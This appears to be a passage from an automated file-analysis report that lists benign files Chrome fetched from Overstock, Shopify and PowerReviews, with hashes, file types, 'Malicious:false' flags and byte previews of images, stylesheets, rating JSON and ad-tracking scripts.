                                                                                                                                                          Entropy (8bit):4.772163314390804
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D8C268E7C3CF2A526CCA6CF68DAA5B4E
                                                                                                                                                          SHA1:7396FEBA9C82D8D572744C5CBBF7ABC864849B67
                                                                                                                                                          SHA-256:CFA5FE1780028DCD88EF9087303662301D5F27F96527B41E11334919B071B32D
                                                                                                                                                          SHA-512:22668BC067449A6C45D58D26A044BAB447ACDA7A8DE1CE876BB33965ABE1B1108E0FD4434E9A01EF7F751A4BFC5AE2D534B8F3D76409FCB2BDB43C153835372B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/ShopPayLoginLoader.CjGSo8kt.css
                                                                                                                                                          Preview:._5Z70J{border-radius:var(--x-global-border-radius, var(--x-border-radius-base));display:flex;flex:1}.oSdnC{margin:auto}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.734945919621499
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9688EA50FFEE55C20205846AAA04FC27
                                                                                                                                                          SHA1:44BE5A47C69DF5BD93A266053689B14552EBC78B
                                                                                                                                                          SHA-256:05640C01A29A22595A88E67196E48C6958D669B2217A4A81A1ECC4797029CA68
                                                                                                                                                          SHA-512:704FA37AEF4D79016D23788854D7318221583CEC6F3A2ED7A87ADFEC1ED26AE5C79260D92573CA914AF1DB65EA74A144AC2A95F364C4797707798508918C84D4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"18019200","rollup":{"average_rating":4.53,"rating_count":627,"review_count":627,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7488
                                                                                                                                                          Entropy (8bit):7.841941811936529
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:7C5D20F555D43B0686693D69608B94DB
                                                                                                                                                          SHA1:B5EA24B086A47C6AF8FC541D33B2605BC029FE5C
                                                                                                                                                          SHA-256:2FA000946F02DBE7055E12DB0F2EC8A6AD950CE976A9F4D8884493843F52AB0D
                                                                                                                                                          SHA-512:02141071691D543FF48F18765B084A57249728E1F1E32C18E8E6CBE42F1B2586949B6FF60C1162ADC8F201E960A589DB3956091EF2B266CEEDD1E24C4870218B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Mandalay-4-foot-Eco-friendly-Synthetic-Wood-Garden-Bench-by-Havenside-Home.jpg?v=1717127747&width=320
                                                                                                                                                          Preview:RIFF8...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*@.@.>9..C.!..I.. ....p...9....~.{Z?. .'.|.`.....Po....-.M...3...G.7.^.............9.o....FH..9....~[........{.......~....#.....7.;...y..O.......L.C.7.......~.?..4......../...?f?Y.....4.m...G.....~.~....x...#....,..t..N.M.S33333333333333333333333332....Z...c.#5..*.(...Rg..C.y....F....;Ju......&i.J..q.....8U..*...4..(.,j_H.+....Z..BjY%.ZfWv*..|..<!.~~K.K......?:.4h..u8F7.1..7K..<...+..u8.B..$.....:..#ZnV..8.+..E.....&:hqa...al....:...../..I...~..X..I......O.."B...a.....r...f......#....f.W....`.n...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):26958
                                                                                                                                                          Entropy (8bit):7.976734166375218
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C9A2B91FE6FDE02295D7E864DB9FF2D9
                                                                                                                                                          SHA1:5D33899AC596B49AF5C7925BC6EA00072796ED57
                                                                                                                                                          SHA-256:888D0BFD600547620316BF5E87CC4D24C4A1EE200A5A9F8C4FEE27AB061DA645
                                                                                                                                                          SHA-512:2452656F47190B989CF3E500891F8E42236B3152D6FF54756AFB8CD9D2A94E8A263A797F3A4FF9A3B43046AC99A75E8674BE4A5EAC2A5A47B270DDFBA787BB95
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Livabliss-Urban-Shag-Bohemian-Tribal-Area-Rug_39bfd574-c708-4926-a942-0903394e0637.jpg?v=1715825710&width=320
                                                                                                                                                          Preview:RIFFFi..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .f..00...*@.@.>9..C"!..... ....Bf7I.../\O... ..9..~.....L.%#.|.2.|.-.G....._......z......C..............z....g...A................t..=@?.{c...C....i.(........._....F.q......w~0.=...O.? ...-...w......$>?>....p.5.;.#.........M.....}.............D>../...g.?.....~..:.......o..p......../.../...?....A............^7=.p|..kel.SO.. f}.*g........9.bl.0.G.....P..rJg.<._....s.A...K....t6U..~7...$..ve.*.{.............L.../'.l...F.....l...."Tb..Q`l+.../.'.......U.P.k9.+1x.9$Yh......b.S..{...0....t.[Z...........9..G.|)..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65444)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):437138
                                                                                                                                                          Entropy (8bit):4.96222517648304
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BE6A019E0609E3FD5715FD8DFE428C39
                                                                                                                                                          SHA1:2A23C8B5406310D076AA25A1DF098B2F658F3066
                                                                                                                                                          SHA-256:4E1220C5B994AB293FD025A117221366376A2590399C176033F4A91ED76859F8
                                                                                                                                                          SHA-512:97A9FA2EE6C2BF4F2B0ABAB02F79C51C6E04EC3AD772232BD42FA58A58F26878F0A12D92B69CA0A97C62710BF55F1B375731B4FAADEC9FC7722DD64E88766BCC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://ui.powerreviews.com/tag-builds/10461/4.1/css/styles.css
                                                                                                                                                          Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.@charset "UTF-8";.p-w-r{display:block!important}.p-w-r a,.p-w-r abbr,.p-w-r acronym,.p-w-r address,.p-w-r applet,.p-w-r article,.p-w-r aside,.p-w-r audio,.p-w-r b,.p-w-r big,.p-w-r blockquote,.p-w-r body,.p-w-r canvas,.p-w-r caption,.p-w-r center,.p-w-r cite,.p-w-r code,.p-w-r dd,.p-w-r del,.p-w-r details,.p-w-r dfn,.p-w-r div,.p-w-r dl,.p-w-r dt,.p-w-r em,.p-w-r embed,.p-w-r fieldset,.p-w-r figcaption,.p-w-r figure,.p-w-r footer,.p-w-r form,.p-w-r h1,.p-w-r h2,.p-w-r h3,.p-w-r h4,.p-w-r h5,.p-w-r h6,.p-w-r header,.p-w-r hgroup,.p-w-r html,.p-w-r i,.p-w-r iframe,.p-w-r img,.p-w-r ins,.p-w-r kbd,.p-w-r label,.p-w-r legend,.p-w-r li,.p-w-r mark,.p-w-r menu,.p-w-r nav,.p-w-r object,.p-w-r ol,.p-w-r output,.p-w-r p,.p-w-r pre,.p-w-r q,.p-w-r ruby,.p-w-r s,.p-w-r samp,.p-w-r section,.p-w-r small,.p-w-r span,.p-w-r strike,.p-w-r strong,.p-w-r sub,.p-w-r summary,.p-w-r sup,.p-w-r table,.p-w-r tbody,.p-w-r td,.p-w-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32850
                                                                                                                                                          Entropy (8bit):7.957116002145529
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:8F2A123D26003C859F27C6C4F336FCA4
                                                                                                                                                          SHA1:CF18E5756C30B8942292CB07C1D1145B2851FCEC
                                                                                                                                                          SHA-256:795D6B28EB4DDD83D89E1218F0A098E084B7A5E77E07F9B8BFEDB3DA8F3AA2C7
                                                                                                                                                          SHA-512:71CD90AC2B76D894048B73DB3C764D74BE372F17E157AD7E6DAF0B377188FEE614EBC9C3B8849FD8D2484FADAB77E8EDAFFDDDC3B6A6737AD670E91369C0D308
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................~w_.jh....!..c.#....MF.|JmZuJ..8$c.A..3<"gl..FS.KR.F..c..Wm....2....A.@`.M.C..X.(4.o.MF.|Kg.*..%7...B...K...)&t%..t..zVz...m....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5982
                                                                                                                                                          Entropy (8bit):7.800553131069314
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BB3FC1EBD6AD60160EFB1C4187593173
                                                                                                                                                          SHA1:D332391403F96C834BCDC90C0516A7FBF9077D1D
                                                                                                                                                          SHA-256:31CF3DD58522E78AA49C761DC5577965B7E43487B13B4F00F8874A5666FCC747
                                                                                                                                                          SHA-512:86A92A03EC219C59AEC118A92DF42BC99268D41B05D85D4B4A87881FC2C8E23F5D0CD31A50DD4B513132607324C72D73566930491D55A0126AA31E6F102B2258
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Leviton-Solid-Wood-Tufted-Asons-Dining-Chair-_28Set-of-2_29_e888e2d2-5626-4902-91d7-9afc4aee6d91.jpg?v=1717131125&width=320
                                                                                                                                                          Preview:RIFFV...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....t...*@.@.>9..C.!..KTP ....p..x5....p/......~....).=.l.......,.;.+.z.q........_..Gv.y...z&.'.o.}..Q.i.... ......._.o....y..<.......?..v...q...8.y.d.<.2`.g.0.3....+_"..._t.!...4...ck.!A.!h&........,u.v..c..s2/T..K.x..5..A'N..sY.....N.R..~....;...d4..C....3.e..K]G~.q..[..GtO9....R....S...|N.3D...-h....1.*o.....WE..L..o........L".....8.9.%P..@..i.R..T..a....%..w...b.**'im.....3T/#..Ivx.r..4...o..!..L......&N7..I~.g...gp...~.3.....;.l%.k....^.Y..P...{.R.;A../.(`..A.!t.w*.m..8..-Z.,..A.0..<..c...(..Y
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2092)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2193
                                                                                                                                                          Entropy (8bit):5.097223543150614
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2DA5C2B5FD6857662E92B60F6B155331
                                                                                                                                                          SHA1:96CC880F4E66EAEAF445A1625D232AC7382B1124
                                                                                                                                                          SHA-256:E06AABD4B6622AC4CCB7E7EF7E1B235AD5E67CC33572894FE033CC889FD6B85A
                                                                                                                                                          SHA-512:E06CFBC879F0C1838F59456017590880EBEE7859725A42172A96C95AC6E75AEB20A40D9A1BBDDCDE9CDAD35D5E2D9204F73064C294B2EE1919612981C8724B6E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/carousel-slider.js?v=150083067762605609661729142870
                                                                                                                                                          Preview:customElements.get("carousel-slider")||customElements.define("carousel-slider",class extends HTMLElement{constructor(){super()}connectedCallback(){this.carousel=this.querySelector(".grid-carousel"),this.initialize()}initialize(){this.carousel.style.display="block",this.flickity=new Flickity(this.carousel,{cellAlign:"left",groupCells:!0,contain:!0,resize:!0,draggable:!0,prevNextButtons:!1,fade:!1,cellSelector:".grid-item",initialIndex:0,pageDots:!1,wrapAround:!1,accessibility:!1,watchCSS:!0,dragThreshold:10}),this.flickity.on("change",index=>{const event=new CustomEvent("slider:slide-change",{detail:{id:this.getAttribute("id"),index}});document.dispatchEvent(event)})}}),customElements.get("carousel-navigation")||customElements.define("carousel-navigation",class extends HTMLElement{constructor(){super()}connectedCallback(){this.init()}init(retry=1,maxRetry=3){if(retry===maxRetry)return;const id=this.getAttribute("for");if(this.carouselComponent=document.querySelector(`#${id}`),!this.caro
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11518
                                                                                                                                                          Entropy (8bit):7.788105770499286
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D73DFB8BD16C3E805314D48B30B1D101
                                                                                                                                                          SHA1:6024CA35B82B453E7D062A9CA771EDD22D63D073
                                                                                                                                                          SHA-256:12ECF86A5070C18530FB4C7660DDFC78E9E25BA04931483ADE2F6EB1512F95EF
                                                                                                                                                          SHA-512:5A343A7FDA7818A59B6CAA6C21E6D99B7804F5222941B0B2422CB1B429288174128AC70C60BFFB52F583CEB15AE4D5594D45CFBE2FE8F7C8D319B8AB48ABE77B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@..................................................................................,..................................................................................................................................D.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):2.459147917027245
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                          SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                          SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                          SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:GIF89a.......,..........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):32698
                                                                                                                                                          Entropy (8bit):7.983294195111161
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:105865C044DA1F57B365E0516F08F8A4
                                                                                                                                                          SHA1:0BDD29C3EA2C9E7693120005AFF46E6EF7E4248B
                                                                                                                                                          SHA-256:C71D4BB4B3532378F9824F8C736EE8EE0DDD3915A0FE8D12D791787F23E33CB9
                                                                                                                                                          SHA-512:398A173F7995F7F0B7B2844C958F634AA999D9A2D3C645AD7825948F13B6855A10A6FCD8594BB673BD671C4F5895FDB218A02CD2263F9BA424F8FE5F95B60372
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/collections/Brown-Seagrass-Bohemian-Vase.jpg?v=1710949289&width=320
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 "}..PO...*@.@.>9..C"!!.{.` .....KL....3.......}#LO..+._.<.=.._?...V.l.q...{.o..............;.O.o......u.......3.....'.O.......?..........W.'........._.~G.m...........{......0./.7...B.7.....?........S.?....9./........m.g...^I.R...o..G...?..m......._.......Q............?..v.1.....o....;....?.?(.....X.s..............}.g./.o.?.........i...g.o.?.^...._.O.W...................~..t..{.~...s....,=...k.E.7..t3;.F. *?.k....h.......E.q...!.F) ./.p..k.R>.y.y...S.'u.;.....J...U...1..7k.S;j.3.../7.D...w...E.;.`...D.]q.!.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):26536
                                                                                                                                                          Entropy (8bit):7.974548423452889
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A35C958F72F03DE768F2AB486D65465E
                                                                                                                                                          SHA1:37C9A8E4FEFB0C0BECB1F7308557F471B73DFBBD
                                                                                                                                                          SHA-256:5FA41494267DE9234F737354D62A820B7299C7540C360E23D3481E640FA45F87
                                                                                                                                                          SHA-512:565415E846B8CC60324B4A3996BE40B79A234E9A16A3150F8131AE202F1028F25CB243AADF318F98986CD39F3D642E298557F0A56C2F028B557A68D183DA7BA0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Euphemia-Brown-Woven-Storage-Basket-Bench---33.5_22-x-16.1_22-x-19.9_22_205e6fc8-7b93-477a-9282-55df516e2a86.jpg?v=1717244553&width=320
                                                                                                                                                          Preview:RIFF.g..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .e.......*@.@.>9..C.!."(.l(@..e....V...L....y....?......O...}]...m.........o....z....>....{............................../._....`......?..1.....|../..._...?.....|..U..._.}..U.....?..........?.~A....~...'..._..E.?....._.....o....Y?........[....p......./..._.O............._....?....G...........l~w..{.................*.n`.K.}..S.....3...b/jm.E.....*.U....BEV.\Q}*..,q8+..6..p.i.A..K.BW...C..W}\..t..t..Jt.y.|...W."S......6$........X.."...............S..9p.3.."..jL.Qp.....PX.Z........'|V....U.@d:..1WhK.fO
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):16
                                                                                                                                                          Entropy (8bit):3.75
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AFB69DF47958EB78B4E941270772BD6A
                                                                                                                                                          SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                                                                                                                          SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                                                                                                                          SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnLYhoCij42TBIFDVNaR8U=?alt=proto
                                                                                                                                                          Preview:CgkKBw1TWkfFGgA=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x650, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):114564
                                                                                                                                                          Entropy (8bit):7.974800485717183
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:88F8733B495A371FB1454240DFD74ADF
                                                                                                                                                          SHA1:656D4D079BD521141ADA505657DD9BAADBDCA13D
                                                                                                                                                          SHA-256:5D926956EB3BE73B622252B91E151FAD4014E8AA86E08123A63A57FF4EEF2A72
                                                                                                                                                          SHA-512:5AF588AB8417E8A422DBD2450865940E5BE77B3781DB7D071048B395D406FE126D9430BFD7C60403B6410413DE4E01BFB636F14CD4AF1266A0A16AA99DE40644
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}..................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):22104
                                                                                                                                                          Entropy (8bit):7.968218455418172
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BA92FB565204345FB456B664FA98B6BE
                                                                                                                                                          SHA1:1C63C440A188321A9674138816D03A10998766C6
                                                                                                                                                          SHA-256:40DD8B265C4447D56532313CCFD6E0CA203239C6805B6B6F94508C711BF4F1D4
                                                                                                                                                          SHA-512:C299817B7471E6E20DD4AE588EB8D6B69FCB3014E82DF5B69508E1182CAEA1AE530B9897AF3C898657BA53790ED2DFDE6DF7611CE85299356831600FD9FA8C82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Livabliss-Urban-Shag-Bohemian-Tribal-Area-Rug_50334aa3-9a2a-4fcb-8b39-1167160c8ebc.jpg?v=1715825715&width=320
                                                                                                                                                          Preview:RIFFPV..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .S..P....*@.@.>9..B.!...5. ....p..C....K<..c.x.~....Q..w.s.y...t]z..............b#..h..~.u.......'.......;.}.;..o@^....3.o.?'..x.~3.7.../W...x|.................'.w..Kye..)>..1..`.`D..7gu.rv...$.......g.w...z-.x.(.Hu.....--^....`....`..t5.a..<Oa...u.....`.n.}...(..&.*.-......5.2._8.*.3......".Rw.R./I....xY.q..H.`BBQ......*....H..f.z.U.......xb..t.t.....T.y...V..L..8..=y^?....M.!...^i|.F...e.r&...M.....BJ..+Py.......B.X..............S.{S.r.Y.:J..@m.S...z ...g..............W.."R.l...DL.<E#.Uj........~.fG..@
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.721340477444628
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E643C53F72B2F27CBC692150130F0675
                                                                                                                                                          SHA1:3395889931E7C06F80C0026D4B6FA712B22BB7A9
                                                                                                                                                          SHA-256:2E5203311AC6FA5CB5AF716FC97479BECD01808E55F485774F4FC01E84DA7A90
                                                                                                                                                          SHA-512:FA12E8B2F747B743D183F97587F4C7E4D220E1CE33A40B13C765DC1397C8BF154FA5BED97B5ADDE5EF75A2A66C3A9FEBAA20C1BCACD473AC84B519BC05763459
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/30759114/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"30759114","rollup":{"average_rating":4.58,"rating_count":360,"review_count":360,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:C source, ASCII text, with very long lines (50719)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):51044
                                                                                                                                                          Entropy (8bit):5.231360263360305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:42D80BE261575D93070511796248AD7A
                                                                                                                                                          SHA1:67B77A90D6098CB3EB96B6EF109FF627CF2D5EE7
                                                                                                                                                          SHA-256:6A574D0F1F7274776D28B76382AE59A61E17273D66E1943587DF7D4DF8F5FECE
                                                                                                                                                          SHA-512:075A0F42E03AD5B6407A4745750C4EEAD30CDC8D9742F158B99666BD206EA490D909FC16E4FD910817F04A043B8C28EEEE0ECE8E66AE0F3E6F0715363EEA7FFF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:window.Criteo=window.Criteo||{};window.Criteo.oneTagConfig={partnerId:111036,visitEventEnabled:true,fpIdentifier:"63b04998-ca6e-4cc2-964f-8986a7867206",dynamic:!0,gumDomain:"gum.criteo.com",privateModeDetectionEnabled:true,blockedSteps:[],addClientSideSupportForId5:false,shouldFillPageId:true,enableOffsiteProjection:true};.!function(){"use strict";function v(e,t){var n=null==(n=window.Criteo)?void 0:n.oneTagConfig;return null!=(n=n&&n[e])?n:t}var I,T="5.29.0",u=((P=I=I||{})[P.None=0]="None",P[P.Cookie=1]="Cookie",P[P.LocalStorage=2]="LocalStorage",P[P.Library=3]="Library",o.checkLocalStorageIsWritable=function(){try{var e;return window.localStorage?(e="criteo_localstorage_check",window.localStorage.setItem(e,e),window.localStorage.removeItem(e),!0):!1}catch(e){return!1}},o.checkCookiesAreWritable=function(){var e=new o("criteo_write_test",1e4),t=(e.setValueWithNoDomain("1"),"1"===e.cookieValue);return e.removeWithNoDomain(),t},o.prototype.setCookieRead=function(){this.isCookieRead=!0},
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15344
                                                                                                                                                          Entropy (8bit):7.984625225844861
                                                                                                                                                          Encrypted:false
